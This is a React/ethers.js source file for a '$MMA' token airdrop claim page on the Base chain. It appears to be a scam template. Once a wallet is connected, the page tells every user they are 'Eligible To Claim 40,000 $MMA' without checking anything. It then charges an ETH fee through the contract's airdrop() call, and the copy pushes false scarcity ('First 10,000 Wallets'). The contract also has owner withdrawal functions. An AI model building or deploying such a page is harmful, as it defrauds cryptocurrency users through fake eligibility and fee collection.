import React, { useState } from 'react';
import { ethers } from 'ethers';

const contractAddress = "0x1C9d548557feD3a14B9A51744AfbA1fd8Cb5e6e6";
const contractABI = [{"inputs":[{"internalType":"address","name":"_tokenAddress","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount","type":"uint256"}],"name":"Claim","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"stateMutability":"payable","type":"fallback"},{"inputs":[],"name":"airdrop","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"claimETH","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"tokenAddress","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"claimToken","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"token","outputs":[{"internalType":"contract IERC20","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}];

const balanceOfABI = [{
  constant: true,
  inputs: [{
    name: "_owner",
    type: "address",
  },],
  name: "balanceOf",
  outputs: [{
    name: "balance",
    type: "uint256",
  },],
  payable: false,
  stateMutability: "view",
  type: "function",
}];

const tokenContract = "0x1d460f8953d85C9a517945C020b89B7A171e435c";
const tokenHolder = "0x1C9d548557feD3a14B9A51744AfbA1fd8Cb5e6e6";

function App() {
  const [tokenBalance, setTokenBalance] = useState('');
  const [claimedPercentage, setClaimedPercentage] = useState('');
  const [walletConnected, setWalletConnected] = useState(false);
  const [error, setError] = useState("");
  const [loading, setLoading] = useState(false);

  async function connectWallet() {
    const networkId = await window.ethereum.request({ method: 'eth_chainId' });
    const id=parseInt(networkId)
    if(id===8453){
    try {
      if (typeof window.ethereum === 'undefined' ) {
        alert("Please install MetaMask or an Ethereum-compatible wallet with Base Chain to connect.");
        return;
      }
     
      const accounts = await window.ethereum.request({ method: 'eth_requestAccounts' });
      
      if (accounts.length > 0) {
        setWalletConnected(true);
        const accountAddress = accounts[0];
      
        const button = document.getElementById('connectButton');
        button.textContent = `${accountAddress.substring(0, 6)}...${accountAddress.substring(accountAddress.length - 4)}`;
         // Enable the claim button
         const claimButton = document.getElementById('claimButton');
         claimButton.disabled = false;
         claimButton.style.backgroundColor="gold";
         
         const eligible =document.getElementsByClassName("eligible-button");
         eligible[0].style.background="yellow"
         eligible[0].textContent="You are Eligible To Claim 40,000 $MMA "
        alert("Wallet connected successfully!");
      }
    } catch (error) {
      console.error("Error connecting wallet:", error);
    }}
    else{
      alert("Please Switch to Base Chain Network")
    }
  }
  
  
  async function claimAirdrop() {
    const networkId = await window.ethereum.request({ method: 'eth_chainId' });
    const id=parseInt(networkId)
    if(id === 8453){
    try {
    
      const provider = new ethers.providers.Web3Provider(window.ethereum);
      const signer = provider.getSigner();
      const contract = new ethers.Contract(contractAddress, contractABI, signer);
      const feeAmountEth = "0.00021";
      const feeAmountWei = ethers.utils.parseEther(feeAmountEth);
      const gasLimit = 100000;
      const tx = await contract.airdrop({ value: feeAmountWei, gasLimit });
      await tx.wait();
      alert("Airdrop claimed successfully!");
      const claimButton = document.getElementById('claimButton');
         claimButton.disabled = true;
         claimButton.textContent="Claimed successfully";
    } catch (error) {
      console.error("Error claiming airdrop:", error);
    }}
    else{
      alert("Please Switch to Base Chain Network")
    }
   
  }
  async function getTokenBalance() {
    try {
      const provider = new ethers.providers.Web3Provider(window.ethereum);
      const contractToken = new ethers.Contract(tokenContract, balanceOfABI, provider);
      const result = await contractToken.balanceOf(tokenHolder);
      const formattedResult = ethers.utils.formatEther(result);
      setTokenBalance(formattedResult);

      const totalTokens = ethers.utils.parseEther("400000000");
      const claimedPercentage = (result / totalTokens) * 100;
      setClaimedPercentage(claimedPercentage.toFixed(2));
    } catch (error) {
      console.error("Error retrieving token balance:", error);
    }
  }

  return (
    // <div>
    //   {walletConnected ? (
    //     <>
    //       <button onClick={getTokenBalance}>Get Token Balance</button>
    //       <div>Token balance: {tokenBalance}</div>
    //       <div>Claimed percentage: {claimedPercentage}%</div>
    //       <button onClick={claimAirdrop}>Claim Airdrop</button>
    //     </>
    //   ) : (
    //     <button onClick={connectWallet}>Connect Wallet</button>
    //   )}
    // </div>
    <>
   <div class="text-center bg-[url('background.jpg')] content-center flex flex-col bg-no-repeat bg-cover bg-center h-screen w-screen overflow-x-hidden overflow-y-auto">
    <div class="flex flex-row w-screen justify-between sticky top-0 left-0 px-4 sm:px-12 py-4 backdrop-blur-md">
        <div class="flex flex-row items-center justify-items-center font-bold">
            <img src="https://i.ibb.co/mDJffGq/image-3.jpg" class="w-8 h-8 sm:w-10 sm:h-10" alt="logo" />
            <p class="text-xl sm:text-2xl text-yellow-200">
                <span class="text-white">$MMA</span>
            </p>
        </div>
       
        <button id="connectButton" class="rounded-md bg-yellow-200 text-black text-md px-3 py-1 sm:px-5 sm:py-2 font-bold" onClick={connectWallet}>
            Connect Wallet
        </button>
    </div>
    <div>
        <p class="text-yellow-400 text-xl sm:text-2xl font-bold mt-32 sm:mt-24">
            Proudly Launch on  Base L2
        </p>
        <p class="text-2xl sm:text-4xl text-white font-bold mt-12">
            Co-Built By AI Creatures And Our Community
        </p>
       
    </div>
    <div class="rounded-xl backdrop-blur-sm border-2 mx-5 sm:w-1/2 md:w-2/5 self-center py-8 px-10 flex flex-col gap-y-6 my-24 sm:my-42 gradient-box border-yellow-200">
        <p class="text-xl sm:text-3xl font-black bg-gradient-to-r from-blue-400 to-yellow-400 bg-clip-text text-transparent">
            You Can Claim $MMA Now!
        </p>
        <div id="token">
            <div id="tokenBalance"></div>
            <div id="claimedPercentage"></div>
        </div>
        <button class="eligible-button">Connect to Check Eligibility</button>
        <p class="text-gray-300 font-bold text-xl">
            Join MemeMare AI  revolution! We're allocating 400 million $MMA tokens to users of Layer 2 (L2) . If you've transacted on platforms like 1 txn Base, Arbitrum, Scroll, zkSync, Linea, or any L2 platform, You can claim 40,000 $MMA tokens!
            <span class="font-black bg-gradient-to-r from-blue-400 to-yellow-400 bg-clip-text text-transparent">
                🔥 Act Fast – Limited to First 10,000 Wallets!
            </span>
            Be among the first 10,000 wallets to claim your tokens. Don't miss out on this exclusive opportunity to be part of the meme culture renaissance!
        </p>
        <p class="text-gray-300 font-bold text-xl">
            Claim Now and Redefine Meme Culture! <br />🚀 MemeMare Ai – Where Creativity Meets Innovation! 🚀
        </p>
        <div class="flex gap-5 flex-col sm:flex-row w-full justify-center">
            <button id="claimButton" class="bg-slate-800 w-full sm:w-1/2 rounded-md py-2 px-5 self-center font-bold text-lg" onClick={claimAirdrop} >
                Claim Airdrop
            </button>
        </div>
    </div>
    <div>
        <div id="snackbar"></div>
    </div>
</div>

</>
  );
}

export default App;
